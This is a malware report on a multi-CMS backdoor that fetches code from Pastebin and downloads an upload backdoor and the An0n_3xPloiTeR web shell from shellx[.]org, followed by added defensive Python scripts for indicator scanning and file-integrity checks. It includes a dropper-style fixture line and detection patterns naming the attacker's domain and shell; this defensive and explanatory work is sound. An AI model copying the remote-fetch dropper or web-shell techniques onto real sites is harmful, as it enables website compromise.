This report covers a backdoor with shell capability that targets several content management systems (CMS). The researcher's findings strongly indicate that the malware was written by a Turkish-speaking actor. The backdoor is built to inject content into the infected website.
The malware identifies which CMS it has landed on by probing for core files, such as /includes/defines.php for Joomla. It checks for Joomla first and then for WordPress, OpenCart and PrestaShop. The infection chain starts by changing the permissions of specified files to 644 (owner read and write; group and everyone else read-only) and then pulling code from Pastebin with a customised HTTP request made through http_get() against a generated Pastebin link. Note that 644 is the normal mode for PHP files on most hosts, so the permission change on its own is a weak indicator; the outbound Pastebin fetch and the files that change afterwards are the stronger signals.
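To make the fingerprinting and indicator checks concrete, here is an added Python example that is not the malware's code and not from the original report. It walks a web root, reports which CMS core files are present in the same order the malware checks them, and flags PHP files containing the strings the report associates with this dropper and its payloads. Only the Joomla path comes from the report; the WordPress, OpenCart and PrestaShop core file paths, the indicator patterns and the sample site the script builds are assumptions for illustration.

```python
"""Added example: CMS fingerprinting and indicator scan for a web root."""
import os
import re
import tempfile

# Core files used to identify the CMS. The Joomla path is the one named in the
# report; the other three are well-known core files chosen here as assumptions.
CMS_MARKERS = {
    "Joomla": "includes/defines.php",
    "WordPress": "wp-includes/version.php",
    "OpenCart": "system/startup.php",
    "PrestaShop": "classes/PrestaShopAutoload.php",
}

# Strings the report associates with this dropper and its payloads. A match
# is a lead to investigate, not proof of infection (assumed patterns).
INDICATORS = {
    "pastebin_url": re.compile(r"pastebin\.com/", re.I),
    "http_get_call": re.compile(r"\bhttp_get\s*\("),
    "chmod_644": re.compile(r"\bchmod\s*\([^)]*\b0?644\b"),
    "shellx_domain": re.compile(r"shellx\.org", re.I),
    "joomla_zip": re.compile(r"joomla(?:hide)?\.zip", re.I),
    "an0n_shell": re.compile(r"An0n_3xPloiTeR", re.I),
}


def identify_cms(root):
    """Return the CMS names whose core file exists under root, checked in the
    same order the malware uses (Joomla first)."""
    return [name for name, rel in CMS_MARKERS.items()
            if os.path.isfile(os.path.join(root, rel))]


def scan_php_files(root):
    """Map each PHP file (posix-style relative path) to the sorted indicator
    names it matches; files with no matches are omitted."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            found = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def build_sample_site(base):
    """Constructed fixture: a Joomla-like tree with one dropper-style file.
    The strings are illustrative only and do nothing; not the real malware."""
    os.makedirs(os.path.join(base, "includes"), exist_ok=True)
    os.makedirs(os.path.join(base, "images"), exist_ok=True)
    with open(os.path.join(base, "includes", "defines.php"), "w") as fh:
        fh.write("<?php\ndefine('JPATH_BASE', __DIR__); // legitimate core file\n")
    with open(os.path.join(base, "images", "cache.php"), "w") as fh:
        fh.write("<?php\n"
                 "chmod('index.php', 0644);\n"
                 "$code = http_get('https://pastebin.com/raw/EXAMPLE');\n")
    return base


def demo_scan():
    """Build the constructed fixture in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="cmsscan_")
    build_sample_site(root)
    return identify_cms(root), scan_php_files(root)


if __name__ == "__main__":
    cms, hits = demo_scan()
    print("CMS detected:", cms)
    for rel, names in hits.items():
        print(f"{rel}: {', '.join(names)}")
```

Run it against a real web root by calling identify_cms and scan_php_files on that path instead of the fixture; treat any hit as a file to pull for manual review, since legitimate plugins can also reference Pastebin or call chmod.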
The initial script written onto the webserver looks like this:
When targeting Joomla, the malware downloads two zip files, joomlahide.zip and joomla.zip, from the domain shellx[.]org. One archive contains a backdoor built for uploading files; the other contains the An0n_3xPloiTeR web shell, which offers website defacement, changing the site's colors, code injection, logout and self-removal options, and more. Both the Pastebin fetch and the shellx[.]org download are outbound connections made by the web server itself, so egress logs or a proxy deny-list for those hosts give a second place to detect or block the chain.
It is highly encouraged that you monitor your web presence for changes to key files using file integrity monitoring (FIM). Consider deploying an OSSEC agent if you use AlienVault, or enabling the AIE rules for FIM in LogRhythm. Keep multiple backups of your website, onsite and offsite, as a precaution against compromise, and retain enough history that you can restore from a copy taken before the backdoor was introduced rather than one that already contains it.
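As an added example of what a FIM baseline-and-compare actually checks for this kind of compromise (not code from the report, OSSEC or LogRhythm), the following Python script hashes every file under a web root, records its permission bits, and on a later run reports files that were added, removed, rewritten, or chmod'ed. The scenario it replays in a temporary directory (a core file chmod'ed to 644, index.php edited, a new PHP file dropped) is constructed to mirror the report's description.

```python
"""Added example: baseline-and-compare file integrity check for a web root."""
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Hash and record the permission bits of every regular file under root,
    keyed by posix-style relative path."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = {
                "sha256": sha256_file(path),
                "mode": format(os.stat(path).st_mode & 0o777, "03o"),
            }
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Classify every difference. A file can appear in both 'modified' and
    'mode_changed' (content rewritten and a chmod applied)."""
    report = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    report["added"] = sorted(set(current) - set(baseline))
    report["removed"] = sorted(set(baseline) - set(current))
    for rel in sorted(set(baseline) & set(current)):
        if baseline[rel]["sha256"] != current[rel]["sha256"]:
            report["modified"].append(rel)
        if baseline[rel]["mode"] != current[rel]["mode"]:
            report["mode_changed"].append(rel)
    return report


def demo():
    """Constructed scenario: baseline a small site, then replay the changes
    the report describes (chmod to 644, a core file edited, a PHP file dropped)."""
    root = tempfile.mkdtemp(prefix="fim_site_")
    os.makedirs(os.path.join(root, "includes"))
    defines = os.path.join(root, "includes", "defines.php")
    index = os.path.join(root, "index.php")
    with open(defines, "w") as fh:
        fh.write("<?php define('JPATH_BASE', __DIR__);\n")
    os.chmod(defines, 0o600)
    with open(index, "w") as fh:
        fh.write("<?php require __DIR__ . '/includes/defines.php';\n")
    os.chmod(index, 0o644)
    # The baseline must live outside the web root (and ideally off the host),
    # or an attacker with write access can simply rewrite it.
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="fim_db_"), "baseline.json")
    save_baseline(build_baseline(root), baseline_path)

    # Simulated compromise: chmod 644, inject into a core file, drop a new file.
    os.chmod(defines, 0o644)
    with open(index, "a") as fh:
        fh.write("<?php /* injected content */\n")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "cache.php"), "w") as fh:
        fh.write("<?php // dropped file\n")
    return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

In production the baseline is taken from a known-clean deployment and stored off the host; each rescan then yields exactly the list of files to review, which is the same signal an OSSEC or LogRhythm FIM rule raises as an alert.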